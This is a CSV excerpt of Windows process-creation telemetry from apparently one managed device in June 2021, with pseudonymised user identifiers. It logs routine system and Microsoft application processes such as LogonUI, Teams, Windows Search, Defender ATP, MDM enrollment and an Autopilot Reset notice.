+257,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 10:21:55.928172900+00:00,8888,LogonUI.exe,"""LogonUI.exe"" /flags:0x0 /state0:0xac280855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-22 11:17:36.425662+00:00,13120,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-22 11:17:36.333146300+00:00,19212,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:21:56.099644800+00:00,2021-06-23 10:28:24.963789600+00:00,c4e4ae07-973b-47b4-a327-5419bc9cfbe7,computerpii_0a470890c60768167990033d701e7bd881398861,167096,False,10.7740.19041.1052,False,11540474045171720,,11540474045174913,2021-06-22 11:17:36.425662+00:00,13120,2021-06-22 11:17:36.425662+00:00,winlogon.exe,13120,256,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-22 11:17:36.426909300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+258,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:07:19.264193100+00:00,19096,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,6404088009311199867,3082750514405554529,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:39.754689300+00:00,1564,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-23 00:51:38.356200500+00:00,14744,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:07:19.445965600+00:00,2021-06-23 01:09:35.263508400+00:00,ac70e268-703e-45b5-84da-b33011645891,computerpii_0a470890c60768167990033d701e7bd881398861,156328,False,10.7740.19041.1052,False,11540474045171817,,11540474045172121,2021-06-23 00:51:39.754689300+00:00,1564,2021-06-23 00:51:39.754689300+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1564,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+259,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:07:28.820866100+00:00,12960,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320630_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320630 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:07:28.965443+00:00,2021-06-23 01:09:35.263750400+00:00,38588d56-d835-4774-891e-12275824e945,computerpii_0a470890c60768167990033d701e7bd881398861,156335,False,10.7740.19041.1052,False,11540474045144190,,11540474045172122,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+260,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:07:36.066482100+00:00,20072,SenseCncProxy.exe,4716,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:07:37.047825200+00:00,2021-06-23 01:09:35.263854300+00:00,b86e7935-768f-4ba7-9af4-9e775b288287,computerpii_0a470890c60768167990033d701e7bd881398861,156338,False,10.7740.19041.1052,False,11540474045137006,,11540474045172124,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+261,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:09:11.006668800+00:00,20720,DeviceEnroller.exe,"deviceenroller.exe /o ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /c /q",PortableExecutable,2021-04-14 01:10:22.237455+00:00,C:\Windows\System32\DeviceEnroller.exe,480256,669107f0f0daf359086d6f4349412f7b,06f7b0c17988cae5a622bdcc27667f771a06243fdf0a88f34981947d5d6bf8f9,588d272614a5522df8539ec8f5ef477b6dcf33d9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:11.117865200+00:00,2021-06-25 02:10:57.039487+00:00,e3f0f9d1-2c38-4aad-910e-1c647fc1e9ce,computerpii_0a470890c60768167990033d701e7bd881398861,185036,False,10.7740.19041.1052,False,11540474045136925,,11540474045178970,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,API for MDM Enrollment,deviceenroller.exe,API for MDM Enrollment
+262,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:09:11.085797100+00:00,18580,omadmprc.exe,"""omadmprc.exe""",PortableExecutable,2021-03-11 01:06:57.521114400+00:00,C:\Windows\System32\omadmprc.exe,89600,f06daf80820426df0fe3a74fd83eb8c4,0ce7f5311ca53e361a0c8a9def0fccecadea41bee0b684bfe662ed9dd93afcd8,fcb0da2da02f514c5fd6de1ede8a88a48e68fdda,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-25 02:05:36.187686900+00:00,19888,svchost.exe,svchost.exe -k netsvcs -p -s dmwappushservice,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:11.125240700+00:00,2021-06-25 02:10:57.039586800+00:00,e58aefe9-d5db-44a5-8f0f-95af0c6159ac,computerpii_0a470890c60768167990033d701e7bd881398861,185037,False,10.7740.19041.1052,False,11540474045178956,,11540474045178971,2021-06-25 02:05:36.187686900+00:00,19888,2021-06-25 02:05:36.187686900+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,19888,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-18 00:35:29.821925200+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,omadmprc,omadmprc.exe,Host Process for Push Router Client of OMA-DM
+263,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:09:11.108717100+00:00,20432,omadmclient.exe,"omadmclient.exe /serverid ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /lookuptype 1 /initiator 0",PortableExecutable,2021-06-09 01:20:50.418603800+00:00,C:\Windows\System32\omadmclient.exe,436736,06291a6c019c8df6a2cdcd9bcf69e99f,e424757d661bb89804b7147fa5e4b60ec21816aed8dedba1b291c6d41bc190b4,092720f8052fbd0fd20d37fa3f16871493d13777,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:11.128506900+00:00,2021-06-25 02:10:57.039697500+00:00,f67297e5-d0eb-41e5-a2d5-eb2c7f2cf6d0,computerpii_0a470890c60768167990033d701e7bd881398861,185038,False,10.7740.19041.1052,False,11540474045136925,,11540474045178972,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,omadmclient,omadmclient.exe,Host Process for OMA-DM Client
+264,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:09:33.389192+00:00,20512,vdsldr.exe,vdsldr.exe -Embedding,PortableExecutable,2021-02-17 04:34:46.279922300+00:00,C:\Windows\System32\vdsldr.exe,27136,3cfffee43d8b6fec842423bbf731f35a,f417f52b06f41b96e135758380e28d74c150828e046a47b9e94098f1b55ef88b,5a08b19519a3e355b9d7493a583b63c6b8a88dbe,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:33.702718400+00:00,2021-06-25 02:10:57.044133500+00:00,1b01c949-8330-47c2-ac20-1b748dc1f2dc,computerpii_0a470890c60768167990033d701e7bd881398861,185080,False,10.7740.19041.1052,False,11540474045136908,,11540474045178984,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,vdsldr.exe,vdsldr.exe,Virtual Disk Service Loader
+265,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 02:09:33.432300100+00:00,20124,vds.exe,vds.exe,PortableExecutable,2021-02-17 04:34:46.263289300+00:00,C:\Windows\System32\vds.exe,675840,d28fb8a8dd61cfa35b6de838e0a3978a,250173049a54473e149fd6f58d45665469b497f6c181925d5fc4ed15f019de55,30aacf5e71a21c2ed83ee22b3349f4fc5403947d,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:33.712855700+00:00,2021-06-25 02:10:57.044232900+00:00,d0a39750-66b9-46db-8a9b-49fbd18585bf,computerpii_0a470890c60768167990033d701e7bd881398861,185081,False,10.7740.19041.1052,False,11540474045136906,,11540474045178985,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,vds.exe,vds.exe,Virtual Disk Service
+266,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:09:38.305998500+00:00,9760,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,16371743156790339825,14101909132760923270,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9428 /prefetch:8",PortableExecutable,2021-06-25 00:37:01.284115+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:39.207616900+00:00,2021-06-25 02:10:57.045466+00:00,4555d6a8-f650-4db4-8957-a2240fabfa02,computerpii_0a470890c60768167990033d701e7bd881398861,185094,False,10.7740.19041.1052,False,11540474045178212,,11540474045178986,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+267,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:09:40.259427500+00:00,19516,wlrmdr.exe,-s 120000 -f 2 -t You're about to be signed out -m Your system needs to restart for Autopilot Reset. Reboot scheduled in 45 minutes. -a 3,PortableExecutable,2021-02-17 04:34:46.345022800+00:00,C:\Windows\System32\wlrmdr.exe,68184,ef9bba7a637a11b224a90bf90a8943ac,2fda95aafb2e9284c730bf912b93f60a75b151941adc14445ed1e056140325b1,4747ec6efd2d41e049159249c2d888189bb33d1d,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:50:09.647766100+00:00,14008,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 11:50:09.489133800+00:00,17800,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:40.946287700+00:00,2021-06-25 02:10:57.045910800+00:00,fc090f36-914f-4550-930d-aa4534b0afe8,computerpii_0a470890c60768167990033d701e7bd881398861,185098,False,10.7740.19041.1052,False,11540474045178088,,11540474045178988,2021-06-24 11:50:09.647766100+00:00,14008,2021-06-24 11:50:09.647766100+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,14008,18560,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 11:50:09.650809300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,WLRMNDR.EXE,WLRMNDR.EXE,Windows logon reminder
+268,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:09:50.861028100+00:00,17412,dllhost.exe,DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:09:50.933619900+00:00,2021-06-25 02:10:57.047855500+00:00,3f893147-5abb-4642-b34f-d546862743aa,computerpii_0a470890c60768167990033d701e7bd881398861,185119,False,10.7740.19041.1052,False,11540474045136908,,11540474045178992,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
